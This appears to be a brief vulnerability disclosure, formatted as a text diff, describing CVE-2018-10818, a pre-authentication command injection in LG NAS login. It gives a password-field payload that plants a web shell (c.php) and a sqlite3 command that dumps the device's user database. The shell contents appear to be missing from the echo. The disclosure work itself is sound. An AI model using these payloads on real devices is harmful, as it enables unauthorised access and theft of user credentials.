Critical Vulnerability Found in Majority of LG NAS Devices

 The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices.

-As we show in the video, you cannot simply log in with any random username and password.
-However, there lies a command injection vulnerability in the “password” parameter (you have to use an interceptor like burp).
+You cannot simply log in with any random username and password.
+However, there lies a command injection vulnerability in the "password" parameter (you have to use an interceptor like burp).
 We can simply trigger this bug by adding to it.
 To add a new user, we can simply write a persistent shell called c.php by using:

 ;echo “” > /tmp/x2;sudo mv /tmp/x2 /var/www/c.php

 Entering it as a password exploits the vulnerability.

 Then, by passing the following command, we can “dump” the users:

 echo “.dump user” | sqlite3 /etc/nas/db/share.db